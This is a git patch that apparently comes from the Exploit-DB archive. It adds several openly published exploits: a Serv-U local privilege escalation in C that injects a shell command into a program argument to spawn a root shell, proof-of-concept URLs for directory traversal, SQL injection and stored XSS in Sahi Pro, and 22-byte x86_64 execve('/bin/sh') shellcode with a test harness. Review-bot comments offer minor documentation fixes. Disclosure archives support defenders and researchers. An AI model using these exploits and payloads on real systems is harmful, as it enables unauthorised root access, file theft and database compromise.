From 745971e212943bdcb87151394a91ba9a0a05eaf0 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 19 Jun 2019 05:01:55 +0000
Subject: [PATCH] DB: 2019-06-19

5 changes to exploits/shellcodes

Serv-U FTP Server < 15.1.7 - Local Privilege Escalation
Sahi pro 7.x/8.x - Directory Traversal
Sahi pro 8.x - SQL Injection
Sahi pro 8.x - Cross-Site Scripting
Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)
---
 exploits/linux/local/47009.c | 24 ++++++++++++++
 exploits/multiple/webapps/47005.txt | 22 +++++++++++++
 exploits/multiple/webapps/47006.txt | 25 ++++++++++++++
 exploits/multiple/webapps/47007.txt | 32 ++++++++++++++++++
 files_exploits.csv | 4 +++
 files_shellcodes.csv | 1 +
 shellcodes/linux_x86-64/47008.c | 51 +++++++++++++++++++++++++++++
 7 files changed, 159 insertions(+)
 create mode 100644 exploits/linux/local/47009.c
 create mode 100644 exploits/multiple/webapps/47005.txt
 create mode 100644 exploits/multiple/webapps/47006.txt
 create mode 100644 exploits/multiple/webapps/47007.txt
 create mode 100644 shellcodes/linux_x86-64/47008.c

diff --git a/exploits/linux/local/47009.c b/exploits/linux/local/47009.c
new file mode 100644
index 000000000..15585a1e9
--- /dev/null
+++ b/exploits/linux/local/47009.c
@@ -0,0 +1,24 @@
+/*
+
+CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation
+
+vulnerability found by:
+Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
+
+to compile and run:
+gcc servu-pe-cve-2019-12181.c -o pe && ./pe
+
+*/
+
+#include
+#include
+#include
+
+int main()
+{
+ char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
+ int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
+ // if execv is successful, we won't reach here
+ printf("ret val: %d errno: %d\n", ret_val, errno);
+ return errno;
+}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47005.txt b/exploits/multiple/webapps/47005.txt
new file mode 100644
index 000000000..45c67633e
--- /dev/null
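Review bot: The header comment at the top of the 47009.c hunk records the affected build as `Serv-U 15.1.6` but not the release that remediates it, while the files_exploits.csv entry added in the same commit describes the issue as `Serv-U FTP Server < 15.1.7`; a reader triaging the CVE has to cross-reference the CSV to learn which upgrade closes it. Suggest adding `fixed in: Serv-U 15.1.7 (see files_exploits.csv entry)` directly under the CVE line of the comment block. The three `#include` lines appear with no header name in this rendering, which looks like an extraction artifact rather than the committed content; worth checking the file as stored.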
+++ b/exploits/multiple/webapps/47005.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Sahi pro ( <= 8.x ) Directory traversal
+# Date: 17-06-2019
+# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
+# Vendor Homepage: https://sahipro.com/
+# Software Link: https://sahipro.com/downloads-archive/
+# Version: 7.x , <= 8.x
+# Tested on: Windows 10
+# CVE : CVE-2018-20470
+
+
+Description :
+
+An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
+
+POC :
+
+vulnerable URL :
+
+''' replace the ip and port of the remote sahi pro server machine '''
+
+
+http://:/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47006.txt b/exploits/multiple/webapps/47006.txt
new file mode 100644
index 000000000..cef0faafa
--- /dev/null
+++ b/exploits/multiple/webapps/47006.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Sahi pro ( <= 8.x ) sensitive information disclosure by SQL injection.
+# Date: 17-06-2019
+# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
+# Vendor Homepage: https://sahipro.com/
+# Software Link: https://sahipro.com/downloads-archive/
+# Version: 7.x , <= 8.x
+# Tested on: Windows 10
+# CVE : CVE-2018-20469
+# POC-URL : https://barriersec.com/2019/06/cve-2018-20469-sahi-pro/
+
+Description :
+
+An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A parameter in the web reports module is vulnerable to SQL injection. This can be exploited to inject SQL queries and run standard h2 system functions.
+
+
+POC :
+
+vulnerable URL :
+
+''' replace the ip and port of the remote sahi pro server machine '''
+
+
+# here sql query is passed directly as part of GET request which can be modified to run standard h2 database functions. in the following POC , "memory_used()" function is injected , which is reflected in "status" column of reports page.
+
+http://:/_s_/dyn/pro/DBReports?sql=SELECT DISTINCT memory_used() AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS.* FROM SUITEREPORTS,SCRIPTREPORTS
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47007.txt b/exploits/multiple/webapps/47007.txt
new file mode 100644
index 000000000..c7d442d2d
--- /dev/null
+++ b/exploits/multiple/webapps/47007.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Sahi pro ( <= 8.x ) Stored XSS
+# Date: 17-06-2019
+# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
+# Vendor Homepage: https://sahipro.com/
+# Software Link: https://sahipro.com/downloads-archive/
+# Version: 7.x , <= 8.x
+# Tested on: Windows 10
+# CVE : CVE-2018-20472
+# POC-URL : https://barriersec.com/2019/06/cve-2018-20472-sahi-pro/
+
+DESCRIPTION :
+
+An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. The logs web interface is vulnerable to stored XSS. Description parameter of Testcase API can be used to exploit the stored XSS.
+
+
+POC :
+
+step 1 :
+
+ create a sahi test automation script with the following content and save the file with ".sah" extension ( example : poc.sah) :
+
+ var $tc1 = _testcase(“TC-1″,””).start();
+
+ _log(“testing stored XSS injection”);
+
+ $tc1.end();
+
+Step 2 :
+
+Execute the created script ( poc.sah ) using sahi GUI controller .
+
+Step 3 : navigate to the web logs console ( http://:/logs ) using the browser for the executed script. XSS is triggered .
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 79f51f6a2..8c00eb7c9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10555,6 +10555,7 @@ id,file,description,date,author,type,platform,port
 46991,exploits/windows/local/46991.py,"Aida64 6.00.5100 - 'Log to CSV File' Local SEH Buffer Overflow",2019-06-14,"Nipun Jaswal",local,windows,
 46996,exploits/linux/local/46996.sh,"Exim 4.87 - 4.91 - Local Privilege Escalation",2019-06-17,"Marco Ivaldi",local,linux,
 46998,exploits/windows/local/46998.txt,"Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)",2019-06-17,Gushmazuko,local,windows,
+47009,exploits/linux/local/47009.c,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation",2019-06-18,"Guy Levin",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41408,3 +41409,6 @@ id,file,description,date,author,type,platform,port
 46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,
 46993,exploits/hardware/webapps/46993.txt,"CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities",2019-06-17,"Alex Akinbi",webapps,hardware,
 47000,exploits/java/webapps/47000.txt,"Spring Security OAuth - Open Redirector",2019-06-17,Riemann,webapps,java,
+47005,exploits/multiple/webapps/47005.txt,"Sahi pro 7.x/8.x - Directory Traversal",2019-06-18,"Goutham Madhwaraj",webapps,multiple,
+47006,exploits/multiple/webapps/47006.txt,"Sahi pro 8.x - SQL Injection",2019-06-18,"Goutham Madhwaraj",webapps,multiple,
+47007,exploits/multiple/webapps/47007.txt,"Sahi pro 8.x - Cross-Site Scripting",2019-06-18,"Goutham Madhwaraj",webapps,multiple,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 40093c8cb..4bf069bc4 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -970,3 +970,4 @@ id,file,description,date,author,type,platform
 46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",shellcode,linux_x86-64
 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",shellcode,linux_x86-64
 46994,shellcodes/linux_x86/46994.txt,"Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)",2019-06-17,"Jonathan So",shellcode,linux_x86
+47008,shellcodes/linux_x86-64/47008.c,"Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)",2019-06-18,"Aron Mihaljevic",shellcode,linux_x86-64
diff --git a/shellcodes/linux_x86-64/47008.c b/shellcodes/linux_x86-64/47008.c
new file mode 100644
index 000000000..a7523757a
--- /dev/null
+++ b/shellcodes/linux_x86-64/47008.c
@@ -0,0 +1,51 @@
+Title: Linux/x86_64 - execve(/bin/sh) (22 bytes)
+;Author: Aron Mihaljevic
+;Architecture: Linux x86_64
+;Shellcode Length: 22 bytes
+;github = https://github.com/STARRBOY
+
+
+============ASM===========================
+global _start
+
+section .text
+
+_start:
+
+
+
+ ;int execve(const char *filename, char *const argv[],char *const envp[])
+ xor rsi, rsi ;clear rsi
+ push rsi ;push null on the stack
+ mov rdi, 0x68732f2f6e69622f ;/bin//sh in reverse order
+ push rdi
+ push rsp
+ pop rdi ;stack pointer to /bin//sh
+ mov al, 59 ;sys_execve
+ cdq ;sign extend of eax
+ syscall
+
+=======Generate Shellcode==========================================
+nasm -felf64 spawn_shell.nasm -o spawn_shell.o
+ld spawn_shell.o -o spawn_shell
+
+
+=========generate C program to exploit=============================
+gcc -fno-stack-protector -z execstack shell.c -o shell
+
+#include
+#include
+
+unsigned char code[]= \
+ "\x48\x31\xf6\x56\x48\xbf"
+ "\x2f\x62\x69\x6e\x2f"
+ "\x2f\x73\x68\x57\x54"
+ "\x5f\xb0\x3b\x99\x0f\x05";
+int main(){
+
+ printf("length of your shellcode is: %d\n", (int)strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+}
\ No newline at end of file
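Review bot: The first line of the hunk, `Title: Linux/x86_64 - execve(/bin/sh) (22 bytes)`, lacks the `;` that prefixes the four header lines beneath it, so the header block is inconsistent with itself; `;Title: Linux/x86_64 - execve(/bin/sh) (22 bytes)` would match the rest. The file as committed is a combined assembly listing, shell build commands and a C harness under a single `.c` path, while the build notes refer to `spawn_shell.nasm` and `shell.c`, neither of which is the committed `shellcodes/linux_x86-64/47008.c`; a one-line comment near the top stating that the listing is a reference transcript of two separate sources rather than a compilable translation unit would spare readers from trying to build 47008.c directly. The two `#include` lines show no header names in this rendering, which looks like an extraction artifact rather than the stored content.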